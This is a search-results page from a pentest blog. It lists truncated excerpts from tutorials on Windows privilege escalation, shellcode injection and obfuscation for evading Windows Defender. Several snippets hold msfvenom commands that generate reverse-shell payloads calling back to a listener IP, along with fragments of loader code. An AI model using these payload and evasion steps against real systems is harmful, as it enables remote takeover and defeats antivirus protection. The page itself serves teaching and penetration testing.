NoSociety.de


Search

You can find the results of your search below.


Matching pagenames:

  • Privilege escalation: Windows admin thanks to Linux

Fulltext results:

FatCat Attack PoC
8 Hits, Last modified: 17 months ago
| Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
Obfuscation: Disguise shellcode as UUIDs
8 Hits, Last modified: 10 months ago
{{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
Privilege escalation: Windows admin thanks to Linux
8 Hits, Last modified: 10 months ago
{{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
Shellcode Injection Part 2
7 Hits, Last modified: 11 months ago
{{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f
Shellcode Injection Part 1
6 Hits, Last modified: 11 months ago
{{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
Shellcode Injection Part 3
5 Hits, Last modified: 12 months ago
{{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-securi... ile 143 / +7 marks the beginning of the filename (WindowsAgent.py) lea edx, [esi + 7] ;Line 184 / command line to execute db "python WindowsAgent.py", 0 ;Line 192 / our URL db "http://172... e === We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <
Shellcode Injection Part 4
5 Hits, Last modified: 10 months ago
{{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
Obfuscation: polymorphic in-memory decoder
3 Hits, Last modified: 9 months ago
{{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
The importance of awareness in IT security
1 Hit, Last modified: 11 months ago
file that was sent as an attachment in an email. Windows integrated it and the malware was able to spread.
Obfuscation: ByteSwapping
1 Hit, Last modified: 7 months ago
{{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-secu